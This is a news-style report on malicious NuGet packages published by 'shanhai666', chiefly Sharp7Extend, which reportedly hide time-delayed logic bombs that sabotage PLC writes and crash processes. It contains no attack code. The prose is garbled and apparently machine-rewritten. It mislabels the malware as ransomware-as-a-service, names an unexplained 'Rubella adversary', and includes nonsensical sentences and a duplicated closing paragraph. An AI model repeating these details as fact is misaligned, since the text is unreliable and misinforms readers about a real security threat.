Security experts recently discovered a set of malicious packages published on the NuGet platform by a user identified as “shanhai666.” Almost 9500 downloads happened collectively just on MyDbRepository, MCDbRepository, Sharp7Extend, SqlDbRepository, SqlRepository, SqlUnicornCoreTest, SqlUnicornCore and SqlLiteRepository. These packages have all mysteriously vanished. These devices have embedded logic bombs. Unlike other Ransomware-as-Service variants, they will trigger on certain dates in August 2027 and November 2028, presenting a dire risk to developers and industrial control systems.
Trojan packages inundated the internet from 2023 to 2024. The worst of these by far though, is Sharp7Extend, which activates its truly terrifying capabilities shortly after installing it. This package has the potential to make a big dent in hurting the industrial programmable logic controllers (PLCs). It randomly sabotages write operations 80% of the time, introducing a randomized delay of 30 to 90 minutes. When those trigger dates come, there’s one in five chance that the malware will completely brick the app process. Mark your calendars for those dates!
Nature of the Threat
Unfortunately, the logic bombs hidden in these bespoke packages are a worrying new tactic to gain trust from developers. This is where the inclusion of Sharp7—a perfectly fine, legitimate library—within the malicious packages gives a false sense of security. Consequently, developers can innocently download and integrate these packages into their projects.
Kush Pandya, CIS cybersecurity expert at the Center for Internet Security, underscored just how dangerous the threat that Sharp7Extend represents is.
“The most dangerous package, Sharp7Extend, targets industrial PLCs with dual sabotage mechanisms: immediate random process termination and silent write failures that begin 30-90 minutes after installation, affecting safety-critical systems in manufacturing environments,” – Kush Pandya
The Rubella adversary triggers the codes in a delayed fashion. This strategy allows them to maximize the number of victims before releasing the malware’s full impact. Pandya noted the effectiveness of this strategy.
“This staggered approach gives the threat actor a longer window to collect victims before the delayed-activation malware triggers, while immediately disrupting industrial control systems,” – Kush Pandya
Implications for Developers
Timing of this attack leaves us worried about longer-term implications for any developer that downloaded these packages. By 2027 or 2028, most of them will likely have moved on to other projects—or to new firms. It’s possible the malware could even turn on when they leave the engagement.
The most troublesome thing, experts warn, is the unpredictability associated with how the malware executes.
“Developers who installed packages in 2024 will have moved to other projects or companies by 2027-2028 when the database malware triggers, and the 20% probabilistic execution disguises systematic attacks as random crashes or hardware failures,” – Socket
Such unpredictability may result in catastrophic failure in operational industrial settings where such applications are expected to be deployed.
Analysis and Response
The Shanhai666 moniker is unique and notable because it strongly suggests that the threat actor is of Chinese origin. Moreover, certain coding practices leave even more weight behind this recommendation. Even more troubling than the sheer mysteriousness of them is the question of motivations behind such malicious acts.
“This campaign demonstrates sophisticated techniques rarely combined in NuGet supply chain attacks,” – Socket
In response to this shocking reality, NuGet has already responded by pulling the affected packages from their platform. In addition, experts are calling on developers to remain on guard. They always conduct extensive source code analyses before introducing any third-party packages into their projects.
In response to this alarming situation, NuGet has taken action by removing the compromised packages from its platform. However, experts urge developers to remain vigilant and conduct thorough source code analyses before integrating any third-party packages into their projects.